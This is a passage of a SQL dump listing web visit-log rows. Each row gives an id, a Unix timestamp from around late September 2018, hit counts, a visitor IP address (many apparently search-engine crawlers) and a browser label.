0,'54.36.149.89','other'),(310417,1538275511,1,1,0,0,'216.244.66.241','other'),(310418,1538275724,1,1,0,0,'54.36.148.162','other'),(310419,1538275792,1,1,0,0,'66.249.70.27','chrome'),(310420,1538275806,1,1,0,0,'207.46.13.98','other'),(310421,1538275826,1,1,0,0,'66.249.64.137','chrome'),(310422,1538275873,8,8,0,0,'144.76.96.236','other'),(310423,1538275879,1,1,0,0,'54.36.148.145','other'),(310424,1538275959,1,1,0,0,'54.36.148.69','other'),(310425,1538275973,2,2,0,0,'66.249.64.135','chrome'),(310426,1538275991,1,1,0,0,'54.36.149.0','other'),(310427,1538276023,1,1,0,0,'54.36.148.76','other'),(310428,1538276116,1,1,0,0,'141.8.142.74','other'),(310429,1538276310,1,1,0,0,'54.36.148.200','other'),(310430,1538276328,1,1,0,0,'54.36.148.184','other'),(310431,1538276369,1,1,0,0,'95.163.255.99','other'),(310432,1538276613,1,1,0,0,'54.36.149.20','other'),(310433,1538276771,1,1,0,0,'54.36.148.160','other'),(310434,1538276941,1,1,0,0,'54.36.148.127','other'),(310435,1538277362,1,1,0,0,'54.36.148.101','other'),(310436,1538277410,1,1,0,0,'54.36.148.145','other'),(310437,1538277542,1,1,0,0,'54.36.148.243','other'),(310438,1538277755,1,1,0,0,'54.36.148.178','other'),(310439,1538277880,1,1,0,0,'54.36.148.141','other'),(310440,1538277965,1,1,0,0,'8.29.198.25','other'),(310441,1538277991,1,1,0,0,'54.36.148.200','other'),(310442,1538278435,1,0,1,0,'66.249.70.25',''),(310443,1538278451,1,0,1,0,'66.249.70.29',''),(310444,1538278503,1,1,0,0,'54.36.148.181','other'),(310445,1538278527,1,1,0,0,'66.249.70.25','chrome'),(310446,1538278707,1,0,1,0,'66.249.64.131',''),(310447,1538278852,1,1,0,0,'95.163.255.96','other'),(310448,1538278880,1,1,0,0,'54.36.149.93','other'),(310449,1538278915,1,1,0,0,'54.36.148.171','other'),(310450,1538279169,1,1,0,0,'54.36.148.35','other'),(310451,1538279318,1,1,0,0,'54.36.149.86','other'),(310452,1538279455,1,1,0,0,'54.36.149.54','other'),(310453,1538279522,1,1,0,0,'61.154.29.215','other'),(310454,1538279617,1,1,0,0,'54.36.148.221','other'),(310455,1538279722,1,1,0,0,'54.36.148.228','other'),(310456,1538279845,1,1,0,0,'54.36.149.93','other'),(310457,1538280145,1,1,0,0,'91.196.178.179','other'),(310458,1538280178,2,2,0,0,'66.249.64.137','chrome'),(310459,1538280214,1,1,0,0,'95.163.255.94','other'),(310460,1538280276,1,1,0,0,'54.36.148.77','other'),(310461,1538280370,1,1,0,0,'54.36.149.69','other'),(310462,1538280564,1,1,0,0,'216.244.66.241','other'),(310463,1538280677,1,1,0,0,'54.36.149.42','other'),(310464,1538281240,2,2,0,0,'95.213.141.126','opera'),(310465,1538281513,1,1,0,0,'54.36.148.138','other'),(310466,1538281704,1,1,0,0,'54.36.148.69','other'),(310467,1538281880,5,5,0,0,'141.8.142.74','other'),(310468,1538281966,1,1,0,0,'54.36.148.28','other'),(310469,1538282061,2,2,0,0,'178.154.171.88','other'),(310470,1538282388,1,1,0,0,'82.145.209.95','other'),(310471,1538282435,1,1,0,0,'54.36.148.45','other'),(310472,1538282446,1,1,0,0,'54.36.148.201','other'),(310473,1538282627,2,2,0,0,'5.9.107.211','other'),(310474,1538282729,1,1,0,0,'54.36.148.35','other'),(310475,1538282937,1,1,0,0,'54.36.149.26','other'),(310476,1538282968,1,1,0,0,'66.249.70.27','chrome'),(310477,1538283124,1,1,0,0,'54.36.148.114','other'),(310478,1538283838,1,1,0,0,'54.36.148.34','other'),(310479,1538284319,2,2,0,0,'8.29.198.25','other'),(310480,1538284353,1,1,0,0,'66.249.64.137','chrome'),(310481,1538284699,1,1,0,0,'66.249.64.131','chrome'),(310482,1538284948,2,2,0,0,'141.8.142.74','other'),(310483,1538284954,1,1,0,0,'178.154.171.88','other'),(310484,1538285490,1,1,0,0,'54.36.148.185','other'),(310485,1538286141,1,1,0,0,'178.154.244.62','other'),(310486,1538286218,1,1,0,0,'66.249.64.135','chrome'),(310487,1538286234,1,1,0,0,'37.9.113.182','other'),(310488,1538286237,1,1,0,0,'178.154.200.41','other'),(310489,1538286297,1,1,0,0,'54.36.148.235','other'),(310490,1538286738,1,1,0,0,'54.36.148.207','other'),(310491,1538286786,1,1,0,0,'54.36.149.61','other'),(310492,1538286878,1,1,0,0,'207.46.13.98','other'),(310493,1538287096,1,0,1,0,'66.249.64.131',''),(310494,1538287156,1,1,0,0,'54.36.148.213','other'),(310495,1538287210,1,1,0,0,'178.154.200.8','other'),(310496,1538287216,5,5,0,0,'141.8.142.74','other'),(310497,1538287219,4,4,0,0,'178.154.171.88','other'),(310498,1538287221,1,1,0,0,'87.250.224.46','other'),(310499,1538287223,1,1,0,0,'178.154.244.62','other'),(310500,1538287225,1,1,0,0,'37.9.113.182','other'),(310501,1538287227,1,1,0,0,'178.154.244.24','other'),(310502,1538287228,1,1,0,0,'37.9.113.151','other'),(310503,1538287230,1,1,0,0,'178.154.200.41','other'),(310504,1538287231,1,1,0,0,'37.9.113.115','other'),(310505,1538287233,1,1,0,0,'213.180.203.8','other'),(310506,1538287236,1,1,0,0,'37.9.113.101','other'),(310507,1538287237,1,1,0,0,'37.9.113.110','other'),(310508,1538287238,1,1,0,0,'178.154.246.4','other'),(310509,1538287240,2,2,0,0,'178.154.171.60','other'),(310510,1538287243,1,1,0,0,'141.8.183.206','other'),(310511,1538287249,1,1,0,0,'141.8.142.152','other'),(310512,1538287873,1,1,0,0,'54.36.149.102','other'),(310513,1538288177,1,1,0,0,'54.36.148.92','other'),(310514,1538288193,1,1,0,0,'54.36.148.82','other'),(310515,1538288233,1,1,0,0,'54.36.148.90','other'),(310516,1538288253,1,1,0,0,'54.36.148.181','other'),(310517,1538288321,1,1,0,0,'66.249.70.29','chrome'),(310518,1538288335,1,0,1,0,'66.249.64.137',''),(310519,1538288361,1,1,0,0,'216.244.66.241','other'),(310520,1538288456,1,1,0,0,'66.102.9.27','chrome'),(310521,1538288602,1,1,0,0,'54.36.149.7','other'),(310522,1538288701,7,7,0,0,'141.8.142.74','other'),(310523,1538288707,1,1,0,0,'54.36.149.84','other'),(310524,1538288784,1,1,0,0,'54.36.149.74','other'),(310525,1538288794,1,1,0,0,'8.29.198.27','other'),(310526,1538289145,2,2,0,0,'87.250.224.46','other'),(310527,1538289239,1,1,0,0,'66.249.64.137','chrome'),(310528,1538289294,1,1,0,0,'37.9.113.182','other'),(310529,1538289295,1,1,0,0,'178.154.171.88','other'),(310530,1538289464,3,3,0,0,'91.242.162.80','other'),(310531,1538289540,1,1,0,0,'216.244.66.241','other'),(310532,1538289547,1,1,0,0,'54.36.148.98','other'),(310533,1538289626,2,2,0,0,'141.8.142.74','other'),(310534,1538289863,1,1,0,0,'54.36.148.93','other'),(310535,1538290230,2,2,0,0,'66.249.64.135','chrome'),(310536,1538290264,1,1,0,0,'54.36.148.47','other'),(310537,1538290380,3,3,0,0,'91.242.162.80','other'),(310538,1538290694,1,1,0,0,'66.249.70.27','chrome'),(310539,1538290834,1,1,0,0,'66.249.64.137','chrome'),(310540,1538290957,1,1,0,0,'54.36.149.19','other'),(310541,1538290975,1,0,1,0,'66.249.64.131',''),(310542,1538291052,2,2,0,0,'216.244.66.241','other'),(310543,1538291195,1,1,0,0,'95.163.255.92','other'),(310544,1538291461,2,2,0,0,'91.242.162.80','other'),(310545,1538292031,1,1,0,0,'54.36.149.57','other'),(310546,1538292231,2,1,1,0,'66.249.64.135',''),(310547,1538292436,1,1,0,0,'54.36.149.10','other'),(310548,1538292567,2,2,0,0,'91.242.162.80','other'),(310549,1538293060,1,1,0,0,'54.36.148.160','other'),(310550,1538293246,1,1,0,0,'54.36.148.122','other'),(310551,1538293292,1,1,0,0,'54.36.148.200','other'),(310552,1538293299,1,1,0,0,'54.36.148.16','other'),(310553,1538293378,1,1,0,0,'54.36.148.137','other'),(310554,1538293399,1,1,0,0,'54.36.148.21','other'),(310555,1538293408,1,1,0,0,'37.55.56.116','chrome'),(310556,1538293418,1,1,0,0,'40.77.167.99','other'),(310558,1538293643,1,1,0,0,'66.249.64.137','chrome'),(310559,1538293688,1,1,0,0,'54.36.149.40','other'),(310560,1538294140,1,1,0,0,'54.36.148.208','other'),(310561,1538294146,1,0,1,0,'66.249.64.135',''),(310562,1538294361,2,2,0,0,'91.242.162.80','other'),(310563,1538294805,1,1,0,0,'66.249.64.131','chrome'),(310564,1538294927,1,1,0,0,'54.36.148.121','other'),(310565,1538294982,1,1,0,0,'66.249.70.25','chrome'),(310566,1538295152,2,2,0,0,'8.29.198.25','other'),(310567,1538295160,1,1,0,0,'54.36.148.23','other'),(310568,1538295389,1,1,0,0,'77.111.244.48','chrome'),(310569,1538295632,1,1,0,0,'54.36.149.58','other'),(310570,1538295633,3,3,0,0,'216.244.66.241','other'),(310571,1538295769,1,1,0,0,'54.36.149.78','other'),(310572,1538295786,3,3,0,0,'91.242.162.80','other'),(310573,1538296054,1,1,0,0,'54.36.149.35','other'),(310574,1538296082,1,1,0,0,'54.36.148.76','other'),(310575,1538296089,1,1,0,0,'54.36.149.39','other'),(310576,1538296250,1,1,0,0,'207.46.13.233','other'),(310577,1538296275,2,2,0,0,'173.234.159.250','other'),(310578,1538296725,1,1,0,0,'66.249.64.135','chrome'),(310579,1538296753,1,1,0,0,'54.36.148.142','other'),(310580,1538297656,1,1,0,0,'66.249.64.131','chrome'),(310581,1538297684,6,6,0,0,'91.242.162.80','other'),(310582,1538297707,1,1,0,0,'180.76.15.152','other'),(310583,1538298153,1,1,0,0,'54.36.148.34','other'),(310584,1538298599,3,3,0,0,'91.242.162.80','other'),(310585,1538299033,1,1,0,0,'216.244.66.241','other'),(310586,1538299141,1,1,0,0,'54.36.148.145','other'),(310587,1538299222,1,1,0,0,'54.36.148.234','other'),(310588,1538299235,1,1,0,0,'66.249.64.131','chrome'),(310589,1538299265,1,1,0,0,'54.36.148.92','other'),(310590,1538299337,2,2,0,0,'66.249.64.135','chrome'),(310591,1538299452,1,0,1,0,'66.249.64.137',''),(310592,1538299472,1,1,0,0,'54.36.148.226','other'),(310593,1538299644,1,1,0,0,'8.29.198.27','other'),(310594,1538300095,1,1,0,0,'207.46.13.95','other'),(310595,1538300157,1,1,0,0,'54.36.148.149','other'),(310596,1538300435,1,1,0,0,'66.249.64.135','chrome'),(310597,1538300442,1,1,0,0,'54.36.148.92','other'),(310598,1538300446,1,1,0,0,'54.36.148.86','other'),(310599,1538300859,2,2,0,0,'66.249.64.137','chrome'),(310600,1538300912,1,1,0,0,'95.163.255.96','other'),(310601,1538301054,1,1,0,0,'40.77.167.99','other'),(310602,1538301059,1,1,0,0,'54.36.148.253','other'),(310603,1538301202,6,6,0,0,'91.242.162.80','other'),(310604,1538301231,2,1,1,0,'66.249.64.131',''),(310605,1538301256,1,1,0,0,'54.36.148.58','other'),(310606,1538301264,1,1,0,0,'54.36.149.107','other'),(310607,1538301509,1,1,0,0,'178.154.171.88','other'),(310608,1538301846,1,1,0,0,'216.244.66.241','other'),(310609,1538301860,1,1,0,0,'54.36.148.106','other'),(310610,1538301971,1,1,0,0,'54.36.149.87','other'),(310611,1538302035,1,1,0,0,'54.36.148.24','other'),(310612,1538302063,1,1,0,0,'54.36.148.135','other'),(310613,1538302213,1,1,0,0,'95.163.255.97','other'),(310614,1538302373,1,1,0,0,'54.36.148.166','other'),(310615,1538302587,1,1,0,0,'54.36.149.71','other'),(310616,1538302655,1,1,0,0,'180.76.15.27','other'),(310617,1538302683,1,1,0,0,'91.242.162.80','other'),(310618,1538302718,2,2,0,0,'141.8.142.74','other'),(310619,1538302783,1,1,0,0,'54.36.149.82','other'),(310620,1538302901,3,3,0,0,'178.154.171.88','other'),(310621,1538303273,3,3,0,0,'87.250.224.46','other'),(310622,1538303445,1,1,0,0,'54.36.148.137','other'),(310623,1538303447,1,1,0,0,'54.36.149.54','other'),(310624,1538303482,1,1,0,0,'66.249.70.25','chrome'),(310625,1538303813,4,4,0,0,'141.8.142.74','other'),(310626,1538303932,1,1,0,0,'178.154.171.88','other'),(310627,1538303938,1,1,0,0,'66.249.64.131','chrome'),(310628,1538303952,1,1,0,0,'178.154.244.62','other'),(310629,1538304598,1,1,0,0,'54.36.149.104','other'),(310630,1538304865,2,2,0,0,'87.250.224.46','other'),(310631,1538304871,1,1,0,0,'39.104.136.157','other'),(310632,1538304872,1,1,0,0,'39.104.144.201','other'),(310633,1538304946,1,1,0,0,'54.36.149.31','other'),(310634,1538305097,1,1,0,0,'39.104.24.62','other'),(310635,1538305100,2,2,0,0,'178.154.171.88','other'),(310636,1538305159,3,3,0,0,'141.8.142.74','other'),(310637,1538305160,1,1,0,0,'54.36.148.194','other'),(310638,1538305211,3,2,1,0,'66.249.64.137',''),(310639,1538305616,1,1,0,0,'54.36.148.100','other'),(310640,1538305630,1,1,0,0,'54.36.149.100','other'),(310641,1538305648,1,1,0,0,'178.154.244.65','other'),(310642,1538305673,1,0,1,0,'66.249.64.135',''),(310643,1538305674,1,1,0,0,'66.249.64.131','chrome'),(310644,1538305725,1,1,0,0,'5.83.16.168','chrome'),(310645,1538305820,1,1,0,0,'207.46.13.95','other'),(310646,1538305833,1,1,0,0,'66.249.70.29','chrome'),(310647,1538305869,1,1,0,0,'178.154.244.62','other'),(310648,1538305975,2,2,0,0,'87.250.224.46','other'),(310649,1538305982,1,1,0,0,'8.29.198.26','other'),(310650,1538305994,1,1,0,0,'37.9.113.182','other'),(310651,1538306023,1,1,0,0,'66.249.64.137','chrome'),(310652,1538306085,1,1,0,0,'46.229.168.141','other'),(310653,1538306089,1,1,0,0,'8.29.198.27','other'),(310654,1538306195,1,1,0,0,'66.249.70.27','chrome'),(310655,1538306517,1,1,0,0,'207.46.13.98','other'),(310656,1538306525,3,3,0,0,'178.154.171.88','other'),(310657,1538306577,1,1,0,0,'178.154.244.34','other'),(310658,1538306640,1,1,0,0,'54.36.148.239','other'),(310659,1538306752,3,3,0,0,'141.8.142.74','other'),(310660,1538306841,1,1,0,0,'54.36.148.233','other'),(310661,1538306908,1,1,0,0,'54.36.149.106','other'),(310662,1538306972,1,1,0,0,'54.36.148.148','other'),(310663,1538307000,1,1,0,0,'188.231.214.75','firefox'),(310664,1538307693,1,1,0,0,'54.36.148.144','other'),(310665,1538308258,1,1,0,0,'54.36.148.238','other'),(310666,1538308269,1,1,0,0,'54.36.149.96','other'),(310667,1538308289,1,1,0,0,'54.36.148.158','other'),(310668,1538308447,1,1,0,0,'54.36.149.5','other'),(310669,1538308550,1,1,0,0,'54.36.148.113','other'),(310670,1538308635,1,1,0,0,'54.36.148.242','other'),(310671,1538308678,2,2,0,0,'66.249.64.135','chrome'),(310672,1538308706,3,2,1,0,'66.249.64.131',''),(310673,1538308865,1,1,0,0,'216.244.66.241','other'),(310674,1538309147,1,1,0,0,'54.36.148.208','other'),(310675,1538309290,1,1,0,0,'54.36.148.250','other'),(310676,1538309611,1,1,0,0,'66.249.64.131','chrome'),(310677,1538310312,1,1,0,0,'54.36.149.93','other'),(310678,1538310484,1,1,0,0,'8.29.198.25','other'),(310679,1538310695,1,1,0,0,'54.36.149.71','other'),(310680,1538311099,1,1,0,0,'54.36.148.196','other'),(310681,1538312048,1,0,1,0,'66.249.64.135',''),(310682,1538313228,1,1,0,0,'54.36.148.105','other'),(310683,1538313257,1,1,0,0,'95.163.255.99','other'),(310684,1538313375,1,1,0,0,'54.36.148.91','other'),(310685,1538314159,1,1,0,0,'54.36.148.99','other'),(310686,1538314275,1,1,0,0,'54.36.148.200','other'),(310687,1538314296,1,1,0,0,'216.244.66.241','other'),(310688,1538314551,1,1,0,0,'54.36.148.237','other'),(310689,1538314990,1,1,0,0,'77.111.247.56','chrome'),(310690,1538315070,1,1,0,0,'54.36.148.153','other'),(310691,1538315109,1,1,0,0,'54.36.149.31','other'),(310692,1538315469,1,1,0,0,'40.77.167.99','other'),(310693,1538315511,1,1,0,0,'54.36.148.192','other'),(310694,1538315722,1,1,0,0,'54.36.149.86','other'),(310695,1538315840,1,1,0,0,'207.46.13.233','other'),(310696,1538316385,1,0,1,0,'66.249.64.137',''),(310697,1538316394,1,1,0,0,'66.249.64.131','chrome'),(310698,1538316558,1,1,0,0,'54.36.149.22','other'),(310699,1538316805,1,1,0,0,'8.29.198.26','other'),(310700,1538316835,1,1,0,0,'54.36.148.197','other'),(310701,1538316931,1,1,0,0,'8.29.198.25','other'),(310702,1538316954,1,1,0,0,'54.36.149.68','other'),(310703,1538317485,1,1,0,0,'95.163.255.96','other'),(310704,1538317752,1,1,0,0,'54.36.148.38','other'),(310705,1538317804,1,1,0,0,'54.36.148.124','other'),(310706,1538317876,1,1,0,0,'66.249.64.137','chrome'),(310707,1538317885,1,1,0,0,'66.249.64.135','chrome'),(310708,1538317950,1,1,0,0,'66.249.70.25','chrome'),(310709,1538318165,1,1,0,0,'54.36.148.60','other'),(310710,1538318571,1,1,0,0,'54.36.148.141','other'),(310711,1538318610,1,1,0,0,'54.36.149.91','other'),(310712,1538318776,1,1,0,0,'207.46.13.95','other'),(310713,1538318849,1,1,0,0,'54.36.149.0','other'),(310714,1538318989,1,1,0,0,'54.36.148.189','other'),(310715,1538319487,1,1,0,0,'178.154.244.62','other'),(310716,1538319777,1,1,0,0,'54.36.149.90','other'),(310717,1538320029,1,1,0,0,'180.76.15.16','other'),(310718,1538320343,1,1,0,0,'95.163.255.99','other'),(310719,1538320612,1,1,0,0,'54.36.149.84','other'),(310720,1538320829,1,1,0,0,'54.36.148.72','other'),(310721,1538321272,1,1,0,0,'40.77.167.99','other'),(310722,1538321321,1,1,0,0,'8.29.198.26','other'),(310723,1538321327,1,1,0,0,'54.36.148.104','other'),(310724,1538321556,1,1,0,0,'54.36.148.250','other'),(310725,1538321920,1,1,0,0,'54.36.148.66','other'),(310726,1538322114,2,2,0,0,'141.8.142.74','other'),(310727,1538322118,3,3,0,0,'87.250.224.46','other'),(310728,1538322226,1,1,0,0,'54.36.148.172','other'),(310729,1538322274,1,1,0,0,'128.69.226.162','chrome'),(310730,1538322362,1,1,0,0,'178.154.171.88','other'),(310731,1538322375,1,1,0,0,'54.36.148.61','other'),(310732,1538322586,1,1,0,0,'180.76.15.33','other'),(310733,1538322630,2,2,0,0,'178.154.244.62','other'),(310734,1538322721,1,1,0,0,'207.46.13.98','other'),(310735,1538322776,1,1,0,0,'54.36.149.21','other'),(310736,1538322815,1,1,0,0,'54.36.148.171','other'),(310737,1538323175,1,1,0,0,'54.36.148.246','other'),(310738,1538323320,1,1,0,0,'39.104.226.239','other'),(310739,1538323409,1,1,0,0,'216.244.66.241','other'),(310740,1538323692,1,1,0,0,'54.36.148.159','other'),(310741,1538324058,1,1,0,0,'66.249.64.135','chrome'),(310742,1538324059,3,2,1,0,'66.249.64.131',''),(310743,1538324166,1,1,0,0,'178.154.171.88','other'),(310744,1538324169,1,1,0,0,'87.250.224.46','other'),(310745,1538324193,1,1,0,0,'178.154.244.62','other'),(310746,1538324212,1,1,0,0,'66.249.70.25','chrome'),(310747,1538324324,1,1,0,0,'54.36.148.23','other'),(310748,1538324393,1,1,0,0,'54.36.149.12','other'),(310749,1538324587,1,1,0,0,'81.163.126.181','firefox'),(310750,1538324639,2,2,0,0,'54.36.149.58','other'),(310751,1538324767,1,1,0,0,'54.36.149.23','other'),(310752,1538326120,1,1,0,0,'54.36.149.92','other'),(310753,1538326321,1,1,0,0,'54.36.148.194','other'),(310754,1538326592,1,1,0,0,'40.77.167.99','other'),(310755,1538326752,1,1,0,0,'54.36.148.132','other'),(310756,1538326832,1,1,0,0,'216.244.66.241','other'),(310757,1538326841,1,1,0,0,'54.36.148.93','other'),(310758,1538326852,1,1,0,0,'54.36.148.197','other'),(310759,1538326934,1,1,0,0,'54.36.149.11','other'),(310760,1538327463,1,1,0,0,'54.36.149.53','other'),(310761,1538327633,2,2,0,0,'8.29.198.25','other'),(310762,1538328056,1,1,0,0,'54.36.148.154','other'),(310763,1538328296,1,1,0,0,'54.36.148.233','other'),(310764,1538329192,1,1,0,0,'54.36.148.45','other'),(310765,1538329442,1,1,0,0,'66.249.64.131','chrome'),(310766,1538329694,1,1,0,0,'207.46.13.95','other'),(310767,1538329786,1,1,0,0,'95.163.255.99','other'),(310768,1538329788,1,1,0,0,'95.163.255.95','other'),(310769,1538330376,2,2,0,0,'216.244.66.241','other'),(310770,1538330561,1,1,0,0,'54.36.149.90','other'),(310771,1538330696,1,1,0,0,'54.36.149.8','other'),(310772,1538331425,1,1,0,0,'207.46.13.95','other'),(310773,1538331822,2,2,0,0,'216.244.66.241','other'),(310774,1538332153,1,1,0,0,'8.29.198.26','other'),(310775,1538332656,1,1,0,0,'176.118.49.54','chrome'),(310776,1538332866,1,1,0,0,'216.244.66.241','other'),(310777,1538333093,1,1,0,0,'207.46.13.98','other'),(310778,1538335453,1,1,0,0,'216.244.66.241','other'),(310779,1538335904,1,1,0,0,'5.248.226.239','chrome'),(310780,1538336860,1,1,0,0,'95.163.255.98','other'),(310781,1538338467,1,1,0,0,'8.29.198.26','other'),(310782,1538338612,1,1,0,0,'8.29.198.27','other'),(310783,1538339615,1,1,0,0,'216.244.66.241','other'),(310784,1538339929,1,1,0,0,'5.166.141.119','msie'),(310785,1538340066,7,7,0,0,'178.154.171.88','other'),(310786,1538340157,6,6,0,0,'141.8.142.74','other'),(310787,1538340207,1,1,0,0,'37.9.113.115','other'),(310788,1538340238,1,1,0,0,'178.154.244.24','other'),(310789,1538340368,4,4,0,0,'87.250.224.46','other'),(310790,1538340556,1,1,0,0,'37.9.113.182','other'),(310791,1538340585,2,2,0,0,'37.52.174.192','chrome'),(310792,1538341120,3,3,0,0,'178.154.171.88','other'),(310793,1538341324,1,1,0,0,'207.46.13.95','other'),(310794,1538341539,1,1,0,0,'82.145.208.138','other'),(310795,1538341754,1,1,0,0,'40.77.167.99','other'),(310796,1538341785,1,1,0,0,'141.8.142.74','other'),(310797,1538341818,1,1,0,0,'178.154.244.62','other'),(310798,1538342118,1,1,0,0,'37.9.113.182','other'),(310799,1538342971,1,1,0,0,'207.46.13.98','other'),(310800,1538342996,1,1,0,0,'8.29.198.27','other'),(310801,1538344446,1,1,0,0,'37.115.145.116','chrome'),(310802,1538345085,1,1,0,0,'141.8.142.74','other'),(310803,1538345118,2,2,0,0,'95.163.255.95','other'),(310804,1538345846,2,2,0,0,'178.154.244.62','other'),(310805,1538346197,1,1,0,0,'178.154.171.88','other'),(310806,1538346880,1,1,0,0,'207.46.13.95','other'),(310807,1538347559,1,1,0,0,'216.244.66.241','other'),(310808,1538348128,1,1,0,0,'94.102.51.78','other'),(310809,1538348168,1,1,0,0,'54.165.59.7','other'),(310810,1538349096,1,1,0,0,'207.46.13.233','other'),(310811,1538349300,1,1,0,0,'8.29.198.27','other'),(310812,1538349447,1,1,0,0,'8.29.198.26','other'),(310813,1538349801,1,1,0,0,'54.165.59.7','other'),(310814,1538351841,1,1,0,0,'95.163.255.95','other'),(310815,1538352621,2,2,0,0,'216.244.66.241','other'),(310816,1538353014,1,1,0,0,'207.46.13.95','other'),(310817,1538353228,1,1,0,0,'207.46.13.98','other'),(310818,1538353832,1,1,0,0,'8.29.198.26','other'),(310819,1538354591,1,0,1,0,'66.249.64.131',''),(310820,1538354676,1,1,0,0,'66.249.64.135','chrome'),(310821,1538355061,1,1,0,0,'54.165.59.7','other'),(310822,1538355844,1,1,0,0,'216.244.66.241','other'),(310823,1538356110,1,1,0,0,'54.165.59.7','other'),(310824,1538357843,2,2,0,0,'141.8.142.74','other'),(310825,1538358159,1,1,0,0,'216.244.66.241','other'),(310826,1538358815,1,1,0,0,'207.46.13.98','other'),(310827,1538360124,1,1,0,0,'8.29.198.27','other'),(310828,1538360283,1,1,0,0,'8.29.198.26','other'),(310829,1538360410,1,1,0,0,'66.249.64.135','chrome'),(310830,1538360760,1,1,0,0,'216.244.66.241','other'),(310831,1538361340,1,1,0,0,'54.165.59.7','other'),(310832,1538362710,1,1,0,0,'54.165.59.7','other'),(310833,1538363366,1,1,0,0,'216.244.66.241','other'),(310834,1538363916,1,1,0,0,'66.102.9.35','chrome'),(310835,1538363938,1,1,0,0,'66.102.9.38','chrome'),(310836,1538363956,1,1,0,0,'66.102.9.40','chrome'),(310837,1538364538,1,1,0,0,'66.249.64.131','chrome'),(310838,1538364664,1,1,0,0,'8.29.198.27','other'),(310840,1538364666,3,3,0,0,'5.9.138.189','other'),(310841,1538366072,1,1,0,0,'82.145.209.55','other'),(310842,1538366407,2,2,0,0,'178.154.171.88','other'),(310843,1538366446,1,1,0,0,'216.244.66.241','other'),(310844,1538368289,1,1,0,0,'46.229.168.149','other'),(310845,1538368391,1,1,0,0,'95.163.255.94','other'),(310846,1538368870,1,1,0,0,'216.244.66.241','other'),(310847,1538370190,1,1,0,0,'141.8.142.74','other'),(310848,1538370258,2,2,0,0,'178.154.171.88','other'),(310849,1538370707,1,1,0,0,'66.249.70.25','chrome'),(310850,1538370915,1,1,0,0,'216.244.66.241','other'),(310851,1538370956,1,1,0,0,'8.29.198.25','other'),(310852,1538371122,1,1,0,0,'8.29.198.27','other'),(310853,1538372358,1,1,0,0,'91.196.178.97','chrome'),(310854,1538372679,1,1,0,0,'95.163.255.93','other'),(310855,1538373514,4,4,0,0,'141.8.142.74','other'),(310856,1538373546,1,1,0,0,'209.90.225.226','chrome'),(310857,1538373567,4,4,0,0,'37.9.113.182','other'),(310858,1538373606,2,2,0,0,'87.250.224.46','other'),(310859,1538373914,1,1,0,0,'95.163.255.94','other'),(310860,1538374144,3,3,0,0,'178.154.171.88','other'),(310861,1538374146,2,2,0,0,'216.244.66.241','other'),(310862,1538374511,1,1,0,0,'141.8.142.74','other'),(310863,1538374728,2,2,0,0,'87.250.224.46','other'),(310864,1538374829,2,2,0,0,'178.154.246.4','other'),(310865,1538374839,1,1,0,0,'54.165.59.7','other'),(310866,1538374852,1,1,0,0,'178.154.200.41','other'),(310867,1538374870,1,1,0,0,'178.154.244.24','other'),(310868,1538374894,1,1,0,0,'178.154.244.34','other'),(310869,1538374939,1,1,0,0,'37.9.113.182','other'),(310870,1538375045,1,0,1,0,'66.249.64.131',''),(310871,1538375368,1,1,0,0,'178.154.171.88','other'),(310872,1538375406,1,1,0,0,'95.163.255.99','other'),(310873,1538375459,2,2,0,0,'141.8.142.74','other'),(310874,1538375499,1,1,0,0,'8.29.198.27','other'),(310875,1538375606,1,1,0,0,'178.154.171.60','other'),(310876,1538375703,1,1,0,0,'87.250.224.46','other'),(310877,1538375953,1,1,0,0,'91.196.178.85','chrome'),(310878,1538376605,1,1,0,0,'91.196.178.169','firefox'),(310879,1538378371,1,1,0,0,'91.196.178.55','chrome'),(310880,1538379345,1,1,0,0,'92.113.29.81','chrome'),(310881,1538379414,2,2,0,0,'216.244.66.241','other'),(310882,1538379814,1,1,0,0,'91.196.178.74','chrome'),(310883,1538380898,1,1,0,0,'95.163.255.94','other'),(310884,1538381308,1,1,0,0,'91.196.178.74','chrome'),(310885,1538381778,1,1,0,0,'8.29.198.27','other'),(310886,1538381963,1,1,0,0,'8.29.198.25','other'),(310887,1538382445,1,1,0,0,'91.196.178.74','chrome'),(310888,1538382663,1,1,0,0,'95.132.11.235','firefox'),(310889,1538382832,1,1,0,0,'178.251.111.106','chrome'),(310890,1538383673,1,1,0,0,'91.196.178.74','chrome'),(310891,1538384087,1,1,0,0,'91.196.178.86','chrome'),(310892,1538384238,1,1,0,0,'54.165.59.7','other'),(310893,1538385142,1,1,0,0,'216.244.66.241','other'),(310894,1538385605,1,1,0,0,'91.196.178.74','chrome'),(310895,1538386085,1,1,0,0,'54.165.59.7','other'),(310896,1538386330,1,1,0,0,'8.29.198.27','other'),(310897,1538386367,1,1,0,0,'91.196.177.15','chrome'),(310898,1538386405,1,1,0,0,'95.163.255.96','other'),(310899,1538386427,1,1,0,0,'207.46.13.233','other'),(310900,1538387058,1,1,0,0,'91.209.11.236','other'),(310901,1538387304,1,1,0,0,'216.244.66.241','other'),(310902,1538387393,1,1,0,0,'66.249.64.137','chrome'),(310903,1538387936,2,2,0,0,'91.196.178.54','chrome'),(310904,1538388296,2,2,0,0,'178.154.171.88','other'),(310905,1538388434,1,1,0,0,'207.46.13.98','other'),(310906,1538388838,7,7,0,0,'141.8.142.74','other'),(310907,1538389026,1,1,0,0,'178.154.244.62','other'),(310908,1538389181,1,1,0,0,'207.46.13.95','other'),(310909,1538390084,1,1,0,0,'216.244.66.241','other'),(310910,1538390217,2,2,0,0,'178.154.244.62','other'),(310911,1538390441,1,1,0,0,'178.154.171.88','other'),(310912,1538392250,1,1,0,0,'141.8.142.74','other'),(310913,1538392401,1,1,0,0,'216.244.66.241','other'),(310914,1538392606,1,1,0,0,'8.29.198.25','other'),(310915,1538392790,1,1,0,0,'8.29.198.27','other'),(310916,1538392994,1,1,0,0,'91.196.178.74','chrome'),(310917,1538393387,1,1,0,0,'207.46.13.233','other'),(310918,1538393622,1,1,0,0,'141.8.142.74','other'),(310919,1538394071,2,2,0,0,'91.196.178.136','chrome'),(310920,1538394165,1,1,0,0,'66.249.70.25','chrome'),(310921,1538394579,1,1,0,0,'207.46.13.98','other'),(310922,1538394914,1,1,0,0,'54.165.59.7','other'),(310923,1538395203,1,1,0,0,'77.111.244.60','chrome'),(310924,1538395401,1,1,0,0,'92.113.28.15','chrome'),(310925,1538395881,1,1,0,0,'178.154.171.88','other'),(310926,1538396061,1,1,0,0,'180.76.15.14','other'),(310927,1538397162,1,1,0,0,'8.29.198.27','other'),(310928,1538397188,2,2,0,0,'162.210.196.98','other'),(310929,1538397491,1,1,0,0,'82.207.122.160','chrome'),(310930,1538397505,1,1,0,0,'141.8.14